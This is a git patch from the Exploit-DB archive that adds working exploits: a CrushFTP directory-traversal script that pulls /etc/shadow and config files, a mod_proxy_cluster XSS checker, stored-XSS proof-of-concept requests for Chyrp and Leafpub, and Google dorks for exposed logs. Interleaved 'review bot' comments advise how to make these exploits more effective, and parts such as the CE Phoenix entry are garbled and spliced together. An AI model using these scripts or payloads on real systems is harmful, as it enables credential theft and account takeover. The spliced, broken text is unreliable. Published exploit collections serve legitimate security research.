From 9d17a3d6ca1aaecf63819d969d9453d71faf8893 Mon Sep 17 00:00:00 2001
From: Exploit-DB
Date: Tue, 14 May 2024 00:16:26 +0000
Subject: [PATCH] DB: 2024-05-14
10 changes to exploits/shellcodes/ghdb
CrushFTP < 11.1.0 - Directory Traversal
Apache mod_proxy_cluster - Stored XSS
CE Phoenix Version 1.0.8.20 - Stored XSS
Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)
Leafpub 1.1.9 - Stored Cross-Site Scripting (XSS)
Prison Management System - SQL Injection Authentication Bypass
PyroCMS v3.0.1 - Stored XSS
Plantronics Hub 3.25.1 - Arbitrary File Read
---
 exploits/multiple/remote/52012.py | 63 +++++++++++++++++
 exploits/php/webapps/52010.py | 109 ++++++++++++++++++++++++++++++
 exploits/php/webapps/52013.txt | 80 ++++++++++++++++++++++
 exploits/php/webapps/52014.txt | 39 +++++++++++
 exploits/php/webapps/52015.txt | 14 ++++
 exploits/php/webapps/52016.txt | 17 +++++
 exploits/php/webapps/52017.txt | 14 ++++
 exploits/windows/local/52011.txt | 25 +++++++
 files_exploits.csv | 8 +++
 ghdb.xml | 24 +++++++
 10 files changed, 393 insertions(+)
 create mode 100755 exploits/multiple/remote/52012.py
 create mode 100755 exploits/php/webapps/52010.py
 create mode 100644 exploits/php/webapps/52013.txt
 create mode 100644 exploits/php/webapps/52014.txt
 create mode 100644 exploits/php/webapps/52015.txt
 create mode 100644 exploits/php/webapps/52016.txt
 create mode 100644 exploits/php/webapps/52017.txt
 create mode 100644 exploits/windows/local/52011.txt
diff --git a/exploits/multiple/remote/52012.py b/exploits/multiple/remote/52012.py
new file mode 100755
index 0000000000..916570e343
--- /dev/null
+++ b/exploits/multiple/remote/52012.py
@@ -0,0 +1,63 @@
+## Exploit Title: CrushFTP Directory Traversal
+## Google Dork: N/A
+# Date: 2024-04-30
+# Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly)
+## Vendor Homepage: https://www.crushftp.com/
+## Software Link: https://www.crushftp.com/download/
+## Version: below 10.7.1 and 11.1.0 (as well as legacy 9.x)
+## Tested on: Windows10
+
+import requests
+import re
+
+# Regular expression to validate the URL
+def is_valid_url(url):
+ regex = re.compile(
+ r'^(?:http|ftp)s?://' # http:// or https://
+ r'(?:(?:A-Z0-9?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain...
+ r'localhost|' # localhost...
+ r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}|' # ...or ipv4
+ r'\[?[A-F0-9]*:[A-F0-9:]+\]?)' # ...or ipv6
+ r'(?::\d+)?' # optional: port
+ r'(?:/?|[/?]\S+)$', re.IGNORECASE)
+ return re.match(regex, url) is not None
+
+# Function to scan for the vulnerability
+def scan_for_vulnerability(url, target_files):
+ print("Scanning for vulnerability in the following files:")
+ for target_file in target_files:
+ print(target_file)
+
+ for target_file in target_files:
+ try:
+ response = requests.get(url + "?/../../../../../../../../../../" + target_file, timeout=10)
+ if response.status_code == 200 and target_file.split('/')[-1] in response.text:
+ print("vulnerability detected in file", target_file)
+ print("Content of file", target_file, ":")
+ print(response.text)
+ else:
+ print("vulnerability not detected or unexpected response for file", target_file)
+ except requests.exceptions.RequestException as e:
+ print("Error connecting to the server:", e)
+
+# User input
+input_url = input("Enter the URL of the CrushFTP server: ")
+
+# Validate the URL
+if is_valid_url(input_url):
+ # Expanded list of allowed files
+ target_files = [
+ "/var/www/html/index.php",
+ "/var/www/html/wp-config.php",
+ "/etc/passwd",
+ "/etc/shadow",
+ "/etc/hosts",
+ "/etc/ssh/sshd_config",
+ "/etc/mysql/my.cnf",
+ # Add more files as needed
+
+ ]
+ # Start the scan
+ 
scan_for_vulnerability(input_url, target_files)
+else:
+ print("Invalid URL entered. Please enter a valid URL.")
\ No newline at end of file
diff --git a/exploits/php/webapps/52010.py b/exploits/php/webapps/52010.py
new file mode 100755
index 0000000000..649bee154e
--- /dev/null
+++ b/exploits/php/webapps/52010.py
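Review bot: The hostname alternative of the validator regex in `is_valid_url` is corrupted: `r'(?:(?:A-Z0-9?\.)+...'` matches the literal characters `A-Z`, an optional `0`, a `9` and a dot rather than a DNS label, so any target given by hostname (`https://files.example.com:8080`) is rejected as an invalid URL and only `localhost`, IPv4 and IPv6 literals ever reach the scan. Replace that line with `r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain...`. The detection test in `scan_for_vulnerability`, `target_file.split('/')[-1] in response.text`, is also too loose: any 200 whose body merely echoes the requested name (a login or error page that mentions `passwd`) is reported as vulnerable, and on a hit the whole body — `/etc/shadow` included if the read really succeeded — is dumped to stdout. Match a per-file content signature instead (for example `'root:' in response.text` for `/etc/passwd`) and print only the first few lines of a hit.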
@@ -0,0 +1,109 @@
+import requests
+import argparse
+from bs4 import BeautifulSoup
+from urllib.parse import urlparse, parse_qs, urlencode, urlunparse
+from requests.exceptions import RequestException
+
+class Colors:
+ RED = '\033[91m'
+ GREEN = '\033[1;49;92m'
+ RESET = '\033[0m'
+
+def get_cluster_manager_url(base_url, path):
+ print(Colors.GREEN + f"Preparing the groundwork for the exploitation on {base_url}..." + Colors.RESET)
+ try:
+ response = requests.get(base_url + path)
+ response.raise_for_status()
+ except requests.exceptions.RequestException as e:
+ print(Colors.RED + f"Error: {e}" + Colors.RESET)
+ return None
+
+ print(Colors.GREEN + f"Starting exploit check on {base_url}..." + Colors.RESET)
+
+ if response.status_code == 200:
+ print(Colors.GREEN + f"Check executed successfully on {base_url}..." + Colors.RESET)
+ # Use BeautifulSoup to parse the HTML content
+ soup = BeautifulSoup(response.text, 'html.parser')
+
+ # Find all 'a' tags with 'href' attribute
+ all_links = soup.find_all('a', href=True)
+
+ # Search for the link containing the Alias parameter in the href attribute
+ cluster_manager_url = None
+ for link in all_links:
+ parsed_url = urlparse(link['href'])
+ query_params = parse_qs(parsed_url.query)
+ alias_value = query_params.get('Alias', [None])[0]
+
+ if alias_value:
+ print(Colors.GREEN + f"Alias value found" + Colors.RESET)
+ cluster_manager_url = link['href']
+ break
+
+ if cluster_manager_url:
+ print(Colors.GREEN + f"Preparing the injection on {base_url}..." + Colors.RESET)
+ return cluster_manager_url
+ else:
+ print(Colors.RED + f"Error: Alias value not found on {base_url}..." 
+ Colors.RESET)
+ return None
+
+ print(Colors.RED + f"Error: Unable to get the initial step on {base_url}")
+ return None
+
+def update_alias_value(url):
+ parsed_url = urlparse(url)
+ query_params = parse_qs(parsed_url.query, keep_blank_values=True)
+ query_params['Alias'] = [""]
+ updated_url = urlunparse(parsed_url._replace(query=urlencode(query_params, doseq=True)))
+ print(Colors.GREEN + f"Injection executed successfully on {updated_url}" + Colors.RESET)
+ return updated_url
+
+def check_response_for_value(url, check_value):
+ response = requests.get(url)
+ if check_value in response.text:
+ print(Colors.RED + "Website is vulnerable POC by :")
+ print(Colors.GREEN + """
+ ____ _ ____ _ _ _____
+ | _ \ ___ __| / ___| ___ ___ | || |___ |
+ | | | |/ _ \/ _` \___ \ / _ \/ __| ____| || | / /
+ | |_| | __/ (_| |___) | __/ (_ |____|__ | / /
+ |____/ \___|\__,_|____/ \___|\___| |_|/_/
+ github.com/DedSec-47 """)
+ else:
+ print(Colors.GREEN + "Website is not vulnerable POC by :")
+ print(Colors.GREEN + """
+ ____ _ ____ _ _ _____
+ | _ \ ___ __| / ___| ___ ___ | || |___ |
+ | | | |/ _ \/ _` \___ \ / _ \/ __| ____| || | / /
+ | |_| | __/ (_| |___) | __/ (_ |____|__ | / /
+ |____/ \___|\__,_|____/ \___|\___| |_|/_/
+ github.com/DedSec-47 """)
+
+def main():
+ # Create a command-line argument parser
+ parser = argparse.ArgumentParser(description="python CVE-2023-6710.py -t https://example.com -u /cluster-manager")
+
+ # Add a command-line argument for the target (-t/--target)
+ parser.add_argument('-t', '--target', help='Target domain (e.g., https://example.com)', required=True)
+
+ # Add a command-line argument for the URL path (-u/--url)
+ parser.add_argument('-u', '--url', help='URL path (e.g., /cluster-manager)', required=True)
+
+ # Parse the command-line arguments
+ args = parser.parse_args()
+
+ # Get the cluster manager URL from the specified website
+ cluster_manager_url = get_cluster_manager_url(args.target, args.url)
+
+ # Check if the cluster manager URL is 
found
+ if cluster_manager_url:
+ # Modify the URL by adding the cluster manager value
+ modified_url = args.target + cluster_manager_url
+ modified_url = update_alias_value(args.target + cluster_manager_url)
+ print(Colors.GREEN + "Check executed successfully" + Colors.RESET)
+
+ # Check the response for the value ""
+ check_response_for_value(modified_url, "")
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/exploits/php/webapps/52013.txt b/exploits/php/webapps/52013.txt
new file mode 100644
index 0000000000..2175fa5aa6
--- /dev/null
+++ b/exploits/php/webapps/52013.txt
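Review bot: `check_response_for_value(modified_url, "")` can never report "not vulnerable": `update_alias_value` writes an empty `Alias` and the test `"" in response.text` is true for every body, so any host that exposes a cluster-manager link is flagged as vulnerable whether or not anything is reflected unescaped. The marker looks like it was lost when the file was captured (a tag payload would not survive as plain text), but as committed the script carries no payload at all; make the marker an explicit `-p/--payload` argument, thread it through `update_alias_value`, and refuse an empty one. The two `requests.get` calls have no `timeout`, and in `main` the first `modified_url = args.target + cluster_manager_url` is dead and will double the host when the `href` found by `get_cluster_manager_url` is already absolute — `urljoin(args.target, cluster_manager_url)` (from `urllib.parse`) handles both forms. Call sites become `modified_url = update_alias_value(urljoin(args.target, cluster_manager_url), args.payload)` and `check_response_for_value(modified_url, args.payload)`.
```python
def update_alias_value(url, payload):
    parsed_url = urlparse(url)
    query_params = parse_qs(parsed_url.query, keep_blank_values=True)
    query_params['Alias'] = [payload]
    updated_url = urlunparse(parsed_url._replace(query=urlencode(query_params, doseq=True)))
    print(Colors.GREEN + f"Injection executed successfully on {updated_url}" + Colors.RESET)
    return updated_url

def check_response_for_value(url, check_value):
    if not check_value:
        raise ValueError("check_value must be a non-empty marker")
    response = requests.get(url, timeout=10)
    # … unchanged: banner printing on match / no match …
```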
@@ -0,0 +1,80 @@
+# Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)
+# Date: 2024-04-24
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://github.com/chyrp/
+# Software Link: https://github.com/chyrp/chyrp/archive/refs/tags/v2.5.2.zip
+# Version: 2.5.2
+# Tested on: MacOS
+
+### Steps to Reproduce ###
+
+- Login from the address: http://localhost/chyrp/?action=login.
+- Click on 'Write'.
+- Type this payload into the 'Title' field: ">
+- Fill in the 'Body' area and click 'Publish'.
+- An alert message saying "Stored" will appear in front of you.
+
+### PoC Request ###
+
+POST /chyrp/admin/?action=add_post HTTP/1.1
+Host: localhost
+Cookie: ChyrpSession=c4194c16a28dec03e449171087981d11;
+show_more_options=true
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
+Gecko/20100101 Firefox/124.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,
+*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate, br
+Content-Type: multipart/form-data;
+boundary=---------------------------28307567523233313132815561598
+Content-Length: 1194
+Origin: http://localhost
+Referer: http://localhost/chyrp/admin/?action=write_post
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+
+-----------------------------28307567523233313132815561598
+Content-Disposition: form-data; name="title"
+
+">
+-----------------------------28307567523233313132815561598
+Content-Disposition: form-data; name="body"
+
+

1337

+-----------------------------28307567523233313132815561598
+Content-Disposition: form-data; name="status"
+
+public
+-----------------------------28307567523233313132815561598
+Content-Disposition: form-data; name="slug"
+
+
+-----------------------------28307567523233313132815561598
+Content-Disposition: form-data; name="created_at"
+
+04/24/24 12:31:57
+-----------------------------28307567523233313132815561598
+Content-Disposition: form-data; name="original_time"
+
+04/24/24 12:31:57
+-----------------------------28307567523233313132815561598
+Content-Disposition: form-data; name="trackbacks"
+
+
+-----------------------------28307567523233313132815561598
+Content-Disposition: form-data; name="feather"
+
+text
+-----------------------------28307567523233313132815561598
+Content-Disposition: form-data; name="hash"
+
+11e11aba15114f918ec1c2e6b8f8ddcf
+-----------------------------28307567523233313132815561598--
\ No newline at end of file
diff --git a/exploits/php/webapps/52014.txt b/exploits/php/webapps/52014.txt
new file mode 100644
index 0000000000..0d1c862d74
--- /dev/null
+++ b/exploits/php/webapps/52014.txt
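Review bot: The payload is missing from the PoC as recorded: the step "Type this payload into the 'Title' field" and the `title` form field both read just `">`, and the `body` field's content is garbled, so the request cannot be replayed from this file. That looks like markup being stripped when the text was captured — the sibling Leafpub entry in this same commit carries its payload URL-encoded and intact, and this one is presumably the same `"><img src=x onerror=alert("Stored")>` tag — but that is inferred, not visible here. Write the payload HTML-escaped or URL-encoded in both places so it survives rendering, e.g. `- Type this payload into the 'Title' field: &quot;&gt;&lt;img src=x onerror=alert(&quot;Stored&quot;)&gt;`. Once the payload is restored, `Content-Length: 1194` should be rechecked against the actual body.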
@@ -0,0 +1,39 @@
+# Leafpub 1.1.9 - Stored Cross-Site Scripting (XSS)
+# Date: 2024-04-24
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://github.com/Leafpub
+# Software Link: https://github.com/Leafpub/leafpub
+# Version: 1.1.9
+# Tested on: MacOS
+
+### Steps to Reproduce ###
+
+- Please login from this address: http://localhost/leafpub/admin/login
+- Click on the Settings > Advanced
+- Enter the following payload into the "Custom Code" area and save it: (">)
+- An alert message saying "Stored" will appear in front of you.
+
+### PoC Request ###
+
+POST /leafpub/api/settings HTTP/1.1
+Host: localhost
+Cookie:
+authToken=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MTM5NjQ2MTcsImV4cCI6MTcxMzk2ODIxNywiZGF0YSI6eyJ1c2VybmFtZSI6ImFkbWluIn19.967N5NYdUKxv1sOXO_OTFiiLlm7sfgDWPXKX7iEZwlo
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
+Gecko/20100101 Firefox/124.0
+Accept: */*
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 476
+Origin: http://localhost
+Referer: http://localhost/leafpub/admin/settings
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Te: trailers
+Connection: close
+
+title=A+Leafpub+Blog&tagline=Go+forth+and+create!&homepage=&twitter=&theme=range&posts-per-page=10&cover=source%2Fassets%2Fimg%2Fleaves.jpg&logo=source%2Fassets%2Fimg%2Flogo-color.png&favicon=source%2Fassets%2Fimg%2Flogo-color.png&language=en-us&timezone=America%2FNew_York&default-title=Untitled+Post&default-content=Start+writing+here...&head-code=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22Stored%22)%3E&foot-code=&generator=on&mailer=default&maintenance-message=&hbs-cache=on
\ No newline at end of file
diff --git a/exploits/php/webapps/52015.txt b/exploits/php/webapps/52015.txt
new file mode 100644
index 0000000000..c01729be3e
--- /dev/null
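Review bot: The "Steps to Reproduce" give the payload as `(">)` while the request body carries `head-code=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22Stored%22)%3E`, i.e. `"><img src=x onerror=alert("Stored")>`; the tag appears to have been lost from the prose when the file was captured, so a reader who follows the steps without decoding the body will not reproduce the alert. Spell the payload out in the step in escaped form, e.g. `- Enter the following payload into the "Custom Code" area and save it: &quot;&gt;&lt;img src=x onerror=alert(&quot;Stored&quot;)&gt;`. The `authToken` cookie is a complete HS256 JWT whose payload decodes to `{"iat":1713964617,"exp":1713968217,"data":{"username":"admin"}}`; it is scoped to the localhost test instance and expired an hour after issue, but published PoCs normally redact live tokens, e.g. `authToken=<redacted>`.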
+++ b/exploits/php/webapps/52015.txt @@ -0,0 +1,14 @@ +# Exploit Title: CE Phoenix Version 1.0.8.20 - Stored XSS +# Date: 2023-11-25 +# Exploit Author: tmrswrr +# Category : Webapps +# Vendor Homepage: https://phoenixcart.org/ +# Version: v3.0.1 +# Tested on: https://www.softaculous.com/apps/ecommerce/CE_Phoenix + +## POC: + +1-Login admin panel , go to this url : https://demos6.softaculous.com/CE_Phoenixx3r6jqi4kl/admin/currencies.php +2-Click edit and write in Title field your payload : 2020-10-21 Alexandros Pappas + + 8440 + https://www.exploit-db.com/ghdb/8440 + Files Containing Usernames + "Header for logs at time" ext:log + "Header for logs at time" ext:log + "Header for logs at time" ext:log + https://www.google.com/search?q="Header for logs at time" ext:log + + 2024-05-13 + Nadir Boulacheb (RubX) + 6535 https://www.exploit-db.com/ghdb/6535 @@ -65505,6 +65517,18 @@ Sahil Saxena 2004-04-13 anonymous + + 8441 + https://www.exploit-db.com/ghdb/8441 + Files Containing Usernames + "START test_database" ext:log + "START test_database" ext:log + "START test_database" ext:log + https://www.google.com/search?q="START test_database" ext:log + + 2024-05-13 + Nadir Boulacheb (RubX) + 4858 https://www.exploit-db.com/ghdb/4858